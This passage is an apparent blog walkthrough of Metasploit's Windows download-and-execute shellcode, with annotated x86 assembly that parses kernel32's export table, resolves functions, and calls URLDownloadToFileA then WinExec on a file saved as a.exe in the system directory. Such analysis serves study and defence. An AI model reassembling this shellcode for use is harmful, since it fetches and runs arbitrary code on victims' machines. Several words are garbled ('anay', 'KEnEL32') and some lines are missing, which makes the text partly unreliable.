nt!_IMAGE_DATA_DIRECTORY Load Config Table

+0x050 VirtualAddress : Uint4B

+0x054 Size : Uint4B


+0x058 VirtualAddress : Uint4B

+0x05c Size : Uint4B


+0x060 VirtualAddress : Uint4B

+0x064 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Delay Import Descriptor

+0x068 VirtualAddress : Uint4B

+0x06c Size : Uint4B


+0x070 VirtualAddress : Uint4B

+0x074 Size : Uint4B


+0x078 VirtualAddress : Uint4B

+0x07c Size : Uint4B


Importing Functions

Now where were we...


+0x000 VirtualAddress : Uint4B -----┐ MOV ESI, [ESI+EBX+0x78] ; ADD ESI, EBX

+0x004 Size : Uint4B │




+0x000 Characteristics : Uint4B

+0x004 TimeDateStamp : Uint4B

+0x008 MajorVersion : Uint2B Number of Names or Functions in EAT

+0x00a MinorVersion : Uint2B Because of aliasing, these can be different values.

+0x00c Name : Uint4B The shellcode uses the wrong one for the name lookup loop.

+0x010 Base : Uint4B

+0x014 NumberOfFunctions : Uint4B ------ MOV ECX, [ESI+0x14]

+0x018 NumberOfNames : Uint4B

+0x01c AddressOfFunctions : Uint4B

+0x020 AddressOfNames : Uint4B -----┐ MOV EDI, [ESI+0x20] ; ADD EDI, EBX

+0x024 AddressOfNameOrdinals : Uint4B │

│ The Export Name Table is just an

│ anay of pointers to C-style strings.

│ The Ordinal table uses the exact

│ same anay indexes.


│ As a concrete example, I'm using RVA values from the WinXP SP2 English KEnEL32.DLL

│ The base address of this DLL is 0x77E80000, so EBX will be pointing there in the code below.

│ Base Address + RVA = Actual Virtual Address in memory (Most of the time)

EDI↓ AddressOfNames=0x577B2 AddressOfNameOrdinals=0x57144 AddressOfFunctions=0x56468

name[ 0]=0x5849B → "AddAtomA\0" ordinal[ 0]=0x0000 function[0x0000]=0x0000932E

name[ 1]=0x584A4 → "AddAtomW\0" ordinal[ 1]=0x0001 function[0x0001]=0x00009BC4

name[ 2]=0x584AD → "AddConsoleAliasA\0" ordinal[ 2]=0x0002 function[0x0002]=0x00044457

name[ 3]=0x584BE → "AddConsoleAliasW\0" ordinal[ 3]=0x0003 function[0x0003]=0x00044420

name[ 4]=0x584CF → "AllocConsole\0" ordinal[ 4]=0x0004 function[0x0004]=0x0004520E

name[ 5]=0x584DC → "AllocateUserPhysicalPages\0" ordinal[ 5]=0x0005 function[0x0005]=0x000339D6

name[ 6]=0x584F6 → "AreFileApisANSI\0" ordinal[ 6]=0x0006 function[0x0006]=0x00018678

name[ 7]=0x58506 → "AssignProcessToJobObject\0" ordinal[ 7]=0x0007 function[0x0007]=0x00043BAE

name[ 8]=0x5851F → "BackupRead\0" ordinal[ 8]=0x0008 function[0x0008]=0x00029776

name[ 9]=0x5852A → "BackupSeek\0" ordinal[ 9]=0x0009 function[0x0009]=0x000299D2

name[ 10]=0x58535 → "BackupWrite\0" ordinal[ 10]=0x000A function[0x000A]=0x0002A2FA

name[ 11]=0x58541 → "BaseAttachCompleteThunk\0" ordinal[ 11]=0x000B function[0x000B]=0x00028916

name[ 12]=0x58559 → "Beep\0" ordinal[ 12]=0x000C function[0x000C]=0x0002A518

[...] [...] [...]

name[339]=0x59DA5 → "GetProcAddress\0" ordinal[339]=0x0153 function[0x0153]=0x0001564B

[...] [...] [...]

name[821]=0x5BEA9 → "lstrlenA\0" ordinal[821]=0x0335 function[0x0335]=0x00017334

name[822]=0x5BEB2 → "lstrlenW\0" ordinal[822]=0x0336 function[0x0336]=0x0000CD5C

║ ⇑ ║ ⇑

╚====================================================╝ ╚========================╝

; So this loop walks down the AddressOfNames anay, doing string comparisons with the strings stored at

; the end of the shellcode. It keeps track of how many iterations the loop has gone through through,

; which will be the ordinal number when the loop exits.

; (The left half of the diagram above.)


; EDI and ECX get clobbered for the REPE CMPSB op

push edi ; 57 ; AddressOfNames Anay Stack: EDI

push ecx ; 51 ; NumberOfFunctions left to go Stack: ECX EDI

mov edi, [edi] ; 8B 3F ; EDI points to start of a Name String

add edi, ebx ; 03 FB ; RVA to VA conversion

mov esi, edx ; 8B F2 ; EDX points to string table at end of shellcode "GetProcAddress" etc.

push byte +0xe ; 6A 0E ; Only compare the first fourteen chars

pop ecx ; 59 ; ECX = 0xE

repe cmpsb ; F3 A6 ; Compare [ESI] with [EDI]

jz Exitloop ; 74 08 ; If we've found the string, we're done

pop ecx ; 59 ; NumberOfFunctions left to check. Stack: EDI

pop edi ; 5F ; Curent Index of AddressOfNames Anay

add edi, byte +0x4 ; 83 C7 04 ; Next AddressOfNames pointer

inc ebp ; 45 ; Ordinal / AddressOfNames Anay index

loop NameToOrdinal ; E2 E9 ;


; snip...

; This code finds the function's address using the ordinal

; (The center half of the diagram above.)

mov ecx, ebp ; 8B CD ; EBP = Ordinal (AddressOfNames Anay index)

mov eax, [esi+0x24] ; 8B 46 24 ; AddressOfNameOrdinals RVA

add eax, ebx ; 03 C3 ; RVA to VA conversion

shl ecx, 1 ; D1 E1 ; Ordinal * 2

add eax, ecx ; 03 C1 ; EAX = (*AddressOfNameOrdinals) + (Ordinal * 2)

; to put in another way EAX = &AddressOfNameOrdinals[Ordinal]

xor ecx, ecx ; 33 C9 ; ECX = 0

mov cx, [eax] ; 66 8B 08 ; CX = Ultimate Index (FunctionOrdinal) into AddressOfFunctions

; (The right half of the diagram above.) (Yes I know that's three halves.)

mov eax, [esi+0x1c] ; 8B 46 1C ; AddressOfFunctions RVA

add eax, ebx ; 03 C3 ; RVA to VA conversion

shl ecx, 0x2 ; C1 E1 02 ; FunctionOrdinal * 4

add eax, ecx ; 03 C1 ; EAX = (*AddressOfFunctions) + (FunctionOrdinal * 4)

; alt. EAX = &AddressOfFunctions[AddressOfNameOrdinals[Ordinal]]

mov eax, [eax] ; 8B 00 ; EAX = RVA of function (ta-da)

add eax, ebx ; 03 C3 ; RVA to VA conversion

The rest of the functions from KEnEL32.DLL which the shellcode uses are looked up with GetProcAddress() in a loop. Each function address is stored on top of the strings at the end of the shellcode. (i.e. It overwrites "GetProcAddress\0GetSystemDirectoryA\0" …etc.)

mov edi, edx ; 8B FA ; EDX points to string table

mov esi, edi ; 8B F7 ; And so now EDI and ESI point there too

add esi, byte +0xe ; 83 C6 0E ; "GetProcAddress" is 0xE bytes long, skip it.

mov edx, eax ; 8B D0 ; The address of GetProcAddress()

push byte +0x4 ; 6A 04 ; Number of names (after "GetProcAddress") to lookup in KEnEL32

pop ecx ; 59 ; ECX = 4 names to lookup

call GetFunctions ; E8 50000000 ; ------



; FARPROC WINAPI GetProcAddress(

; __in HMODULE hModule,

; __in LPCSTR lpProcName

; );


xor eax,eax ; 33C0 ; EAX = 0

lodsb ; AC ; EAX = byte [ESI] assumes DF=0 I guess

test eax,eax ; 85C0 ; Check if at end of function name string

jnz Getfunctions ; 75F9 ; The loop advances ESI to the end of

; this sting and start of next

push ecx ; 51 ; Loop counter: 4,3,2,1

push edx ; 52 ; GetProcAddress function address

push esi ; 56 ; lpProcName = ESI = Start of name string in list

push ebx ; 53 ; hModule = KEnEL32 base address or URLMON base address

; GetProcAddress(hModule [in], lpProcName [in])

call edx ; FFD2 ; EAX = GetProcAddress(EBX, ESI)

pop edx ; 5A ; GetProcAddress function address

pop ecx ; 59 ; Loop counter: 4,3,2,1

stosd ; AB ; Store Function Pointer, EAX, at [EDI]

loop Getfunctions ; E2EE ; Lather, rinse, repeat

xor eax,eax ; 33C0 ; Retun zero upon success?

ret ; C3 ; _______________________________________

db "GetProcAddress",0 ; EDI starts at this address.

db "GetSystemDirectoryA",0 ; After loading URLMON becomes [edi-0x14]

db "WinExec",0 ; After loading URLMON becomes becomes [edi-0x10]

db "ExitThread",0 ; After loading URLMON becomes becomes [edi-0x0C]

db "LoadLibraryA",0 ; [edi-0x04] After loading URLMON becomes becomes [edi-0x08]



add esi, byte +0xd ; 83C60D ; ESI was at start of "LoadLibraryA\0" which is 0xD long

push edx ; 52 ; GetProcAddress function address

push esi ; 56 ; lpFileName = ESI point to "urlmon\0"

call near [edi-0x4] ; FF57FC ; EAX = LoadLibrary(ESI)


; lpFileName


; __in LPCTSTR lpFileName

; );

pop edx ; 5A ; GetProcAddress function address

mov ebx, eax ; 8B D8 ; Handle to URLMON module

push byte +0x1 ; 6A 01 ; Number of names to lookup in URLMON.DLL

pop ecx ; 59 ; ECX = 1 name to lookup

call Getfunctions ; E8 3D000000 ; ------

add esi, byte +0x13 ; 83 C6 13 ; ESI was at "URLDownloadToFileA\0" so move past it

push esi ; 56 ; szURL = ESI points to URL


db "urlmon",0 ;

db "URLDownloadToFileA",0 ; becomes [edi-0x04]

Calling Functions (finally at last)

The URL is terminated with a 0x80 byte rather than a 0x00. As this URL string is never encoded; It's probably an attempt to avoid null bytes, even to the very end!


inc esi ; 46 ; Next letter of URL

cmp byte [esi],0x80 ; 803E80 ; Is it the end?

jnz strlen_80 ; 75FA ;

xor byte [esi],0x80 ; 803680 ; At end of URL, change 0x80 into a 0x00

pop esi ; 5E ; szURL = ESI points to URL

This just gets the path to the System32 directory.


; UINT WINAPI GetSystemDirectory(

; __out LPTSTR lpBuffer

; __in UINT uSize

; );

sub esp, byte +0x20 ; 83EC20 ; Make some space for the string on the stack

mov ebx, esp ; 8BDC ; EBX = lpBuffer

push byte +0x20 ; 6A20 ; uSize = 0x20 bytes

push ebx ; 53 ; lpBuffer (0x20 bytes on stack)

call near [edi-0x14] ; FF57EC ; EAX = string length = GetSystemDirectoryA(EBX, 0x20)

The string "\\a.exe" is appended onto the end of whatever GetSystemDirectory() retuned, and the downloaded file from the URL is written to that.


; HRESULT URLDownloadToFile( LPUNKNOWN pCaller


; LPCTSTR szFileName,

; DWORD dwReserved,


; );

mov dword [ebx+eax], 0x652e615c ; C704035C612E65 ; lpBuffer + length = "\\a.e"

mov dword [ebx+eax+0x4], 0x6578 ; C744030478650000 ; lpBuffer + length + 4 = "ex"

xor eax, eax ; 33C0 ; EAX = 0 if that wasn't obvious

push eax ; 50 ; lpfnCB = 0

push eax ; 50 ; dwReserved = 0

push ebx ; 53 ; szFileName = %systemdir%\a.exe

push esi ; 56 ; szURL = URL at end of shellcode

push eax ; 50 ; pCaller = 0

call near [edi-0x4] ; FF57FC ; URLDownloadToFileA(0, ESI, EBX, 0, 0);

Y'all know what's coming next... WinExec!



; __in LPCSTR lpCmdLine,

; __in UINT uCmdShow

; );

mov ebx,esp ; 8B DC ; EBX points to %systemdir%\a.exe

push eax ; 50 ; uCmdShow = either S_OK or E_OUTOFMEMORY or INET_E_DOWNLOAD_FAILURE

; I think what is intended is uCmdShow = 0

push ebx ; 53 ; lpCmdLine = %systemdir%\a.exe

call near [edi-0x10] ; FF57F0 ; WinExec("%systemdir%\\a.exe",0);


And that's it, we're basically done, so exit. Note, if someone wanted to fix the EXITFUNC feature for this in MSF, you can either store ExitThread or ExitProcess

in the string table (the arguments are the same, but their lengths are off by one.) or modify the shellcode logic itself. I'm very tempted to make the changes myself, but I've got a bunch of other stuff I need to get done this week.

(The easiest, but least elegant fix is to just swap out all the encoded strings starting at 0x10A and going all the way to the end.)


; VOID WINAPI ExitThread(

; __in DWORD dwExitCode

; );

push eax ; 50 ; EnOR_BAD_FORMAT or EnOR_FILE_NOT_FOUND or one

; of the other things WinExec() might retun.

; It's 32 or over on success

call near [edi-0xc] ; FF57F4 ; ExitThread(EAX)

Let me know if I've made any enors in this write up. I was too lazy to check most of this out in a debugger; It's all come directly out of my head.

I've put an easy-to-assemble version of all this here:


Note that NASM uses the altenative instruction encodings for some x86 opcodes, so you won't get the exact same binary out of NASM as the original in MSF. If you don't know what this means, then don't wony, I'll explain it later.

Exercises for the reader

  1. Why does the shellcode use GetProcAddress() to look up the rest of the function names instead of the code which looked up "GetProcAddress" from the KEnEL32.DLL export table in the first place?

  3. What other shellcode has the same NumberOfFunctions verses NumberOfNames usage bug as this?

  5. What other shellcode uses %systemdir%\a.exe verses something else.

  7. What happens if URLDownloadToFileA() fails?